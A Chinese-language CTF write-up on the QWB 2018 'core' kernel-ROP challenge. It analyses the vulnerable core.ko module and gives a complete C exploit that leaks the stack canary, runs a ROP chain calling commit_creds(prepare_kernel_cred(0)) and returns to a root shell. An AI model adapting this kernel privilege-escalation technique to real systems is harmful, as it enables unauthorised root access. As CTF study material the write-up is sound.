前面做了一道kernel-uaf的题，接着复现一下kernel-rop的题目

环境分析

• 首先按照kernel pwn的套路，先解压core.cpio文件，查看init文件

#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
cat /proc/kallsyms > /tmp/kallsyms
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig eth0 up
udhcpc -i eth0
ifconfig eth0 10.0.2.15 netmask 255.255.255.0
route add default gw 10.0.2.2 
insmod /core.ko

poweroff -d 120 -f &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
echo 'sh end!\n'
umount /proc
umount /sys

poweroff -d 0  -f

• 从脚本中可以看到有我们需要分析的模块文件是core.ko，然后还有条定时关机的命令(poweroff -d 120 -f &)，为了不影响我们调试，所以把这条命令删掉再重打包，/tmp目录下有一个符号文件kallsyms，可以leak出内核信息，找到commit_creds和prepare_kernel_cred的地址

./gen_cpio.sh core.cpio

• 启动时候发现有报错，是因为分配的内存过小，将start.sh 中-m分配的64M修改为128M即可

 Kernel panic - not syncing: Out of memory and no killable processes...

模块分析

• 首先看开了什么保护

☁  give_to_player  checksec core.ko 
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/core.ko'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

• 然后ida分析，core_copy_func函数的参数是signed __int64而qmemcpy的函数是unsigned __int16，当传入参数a1为负数会产生溢出，将我们的rop链拷贝到栈上

signed __int64 __fastcall core_copy_func(signed __int64 a1)
{
  signed __int64 result; // rax
  __int64 v2; // [rsp+0h] [rbp-50h]
  unsigned __int64 v3; // [rsp+40h] [rbp-10h]

  v3 = __readgsqword(0x28u);
  printk(&unk_215);
  if ( a1 > 63 )
  {
    printk(&unk_2A1);
    result = 0xFFFFFFFFLL;
  }
  else
  {
    result = 0LL;
    qmemcpy(&v2, &name, (unsigned __int16)a1);
  }
  return result;
}

• core_ioctl函数可以控制全局变量off，而core_read会根据off的偏移来拷贝 64 个字节到用户空间，我们可以控制off来leak canary和一些地址

__int64 __fastcall core_ioctl(__int64 a1, int a2, __int64 a3)
{
  signed __int64 v3; // rbx

  v3 = a3;
  switch ( a2 )
  {
    case 1719109787:
      core_read(a3);
      break;
    case 1719109788:
      printk(&unk_2CD);
      off = v3;
      break;
    case 1719109786:
      printk(&unk_2B3);
      core_copy_func(v3);
      break;
  }
  return 0LL;
}

unsigned __int64 __fastcall core_read(__int64 a1)
{
  __int64 v1; // rbx
  __int64 *v2; // rdi
  signed __int64 i; // rcx
  unsigned __int64 result; // rax
  __int64 v5; // [rsp+0h] [rbp-50h]
  unsigned __int64 v6; // [rsp+40h] [rbp-10h]

  v1 = a1;
  v6 = __readgsqword(0x28u);
  printk(&unk_25B);
  printk(&unk_275);
  v2 = &v5;
  for ( i = 16LL; i; --i )
  {
    *(_DWORD *)v2 = 0;
    v2 = (__int64 *)((char *)v2 + 4);
  }
  strcpy((char *)&v5, "Welcome to the QWB CTF challenge.\n");
  result = copy_to_user(v1, (char *)&v5 + off, 64LL);
  if ( !result )
    return __readgsqword(0x28u) ^ v6;
  __asm { swapgs }
  return result;
}

• core_write让我们对name进行写入，通过core_write和core_copy_func函数实现写入rop_chain

signed __int64 __fastcall core_write(__int64 a1, __int64 a2, unsigned __int64 a3)
{
  unsigned __int64 v3; // rbx

  v3 = a3;
  printk(&unk_215);
  if ( v3 <= 0x800 && !copy_from_user(&name, a2, v3) )
    return (unsigned int)v3;
  printk(&unk_230);
  return 4294967282LL;
}

利用思路

1. 通过 ioctl 设置 off，然后通过 core_read() leak 出 canary
2. 通过 core_write() 向 name 写，构造 ropchain
3. 通过 core_copy_func() 从 name 向局部变量上写，通过设置合理的长度和 canary 进行 rop
4. 通过 rop 执行 commit_creds(prepare_kernel_cred(0))
5. 返回用户态，通过 system(“/bin/sh”) 等起 shell

编写exp

1. 编写exp的时候还要边调试，下图是调试寻找泄漏canary的偏移，由图可知道canary距离rsp的偏移是0x40，返回地址的偏移是0x50

2. 接下来是找覆盖返回地址的偏移，由图可知返回地址偏移是0x50

3. 找gadget的偏移，不能从带符号的vmlinux里面找gadget,要从bzImage里面提取之后再找gadget，先用extract-vmlinux提取文件出来，再用ropper找gadegt

☁  give_to_player  ./extract-vmlinux ./bzImage > rop_gadget
☁  give_to_player  ropper --file './rop_gadget' --search "pop rdx; ret"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdx; ret

[INFO] File: ./rop_gadget
0xffffffff81f1023d: pop rdx; ret 0x6fff; 
0xffffffff817f8da2: pop rdx; ret 0xa0; 
0xffffffff817023a4: pop rdx; ret 0xebff; 
0xffffffff810a0f49: pop rdx; ret;

☁  give_to_player  bpython
bpython version 0.17.1 on top of Python 2.7.12 /usr/bin/python
>>> from pwn import *
>>> vmlinux = ELF("./rop_gadget")
[*] '/home/hacker_mao/desktop/ctf_game/QWB2018/give_to_player/rop_ga
dget'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0xffffffff81000000)
    RWX:      Has RWX segments
>>> pop_rdx_ret_offset = hex(0xffffffff810a0f49 - 0xffffffff81000000)
>>> pop_rdx_ret_offset
'0xa0f49'

4. 写exp，这里直接套用charlie师傅的exp

//gcc exp.c -o exp -static -masm=intel
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <string.h>


size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*]status has been saved.");
}

void binsh()
{
    system("/bin/sh");
}

int main()
{
    save_status();
    void* commit_creds;
    void* base_addr;
    void* prepare_kernel_cred;
    
    FILE* base=popen("grep startup_64 /tmp/kallsyms |awk -F' ' '{print $1}'","r");
    fscanf(base,"%p",&base_addr);
    commit_creds=base_addr+0x9c8e0;
    prepare_kernel_cred=base_addr+0x9cce0;

    printf("commit_creds is %p \nbase is %p \nprepare is %p\n",commit_creds,base_addr,prepare_kernel_cred);

    fclose(base);
    
    int fd = open("/proc/core",O_WRONLY);

    if(fd<0)
    {
        printf("open core failed\n");
        exit(-1);
    }

    ioctl(fd,0x6677889C,0x40); //set offset
    long long canary[0x10];
    ioctl(fd,0x6677889B,canary); //get canary
    printf("ret addr is %lx\n",canary[2]);
    long long payload[0x40];
   
     
    payload[8]=canary[0]; //canary
    payload[9]=canary[1]; //rbp

    void* mov_rdi_rax_jmp_rdx=base_addr+0x6a6d2;
    void* prdx=base_addr+0xa0f49;
    void* prdi=base_addr+0xb2f;
    void* swapgs=base_addr+0xa012da;
    void* iretq=base_addr+0x50ac2;

    int i=10;
    payload[i++]=prdi; //pop rdi;
    payload[i++]=0;
    payload[i++]=prepare_kernel_cred; //prepare_kernel_cred(0);
    payload[i++]=prdx; //pop rdx;
    payload[i++]=commit_creds; //commit_creds(prepare_kernel_cred(0));
    payload[i++]=mov_rdi_rax_jmp_rdx; //mov rdi, rax; call rdx;
    payload[i++]=swapgs; //swapgs; popfq; ret
    payload[i++]=0;
    payload[i++]=iretq; //iretq; ret; 
    payload[i++]=(size_t)binsh;
    payload[i++] = user_cs;
    payload[i++] = user_rflags;
    payload[i++] = user_sp;
    payload[i++] = user_ss;

    write(fd,payload,0x200);
    long long v=0xffffffffffff0000 | (0x100);
    ioctl(fd,0x6677889A,v);
    return 0;
}

5. 编译exp，然后重打包fs，启动系统，运行exp

☁  give_to_player  gcc exp.c -o exp -static -masm=intel
☁  give_to_player  cd core
☁  core  ./gen_cpio.sh core.cpio
☁  core  cp ./core.cpio ../
☁  core  cd ..
☁  give_to_player  ./start.sh 
/ $ ./exp
[*]status has been saved.
commit_creds is 0xffffffffbd29c8e0 
base is 0xffffffffbd200000 
prepare is 0xffffffffbd29cce0
ret addr is ffffffffc039119b
/ # id
uid=0(root) gid=0(root)
/ # 

参考文章：

• https://ch4r1l3.github.io/2018/10/09/linux-kernel-pwn-%E5%88%9D%E6%8E%A2-3/
• http://m4x.fun/post/linux-kernel-pwn-abc-1/#kernel-rop-2018%E5%BC%BA%E7%BD%91%E6%9D%AF-core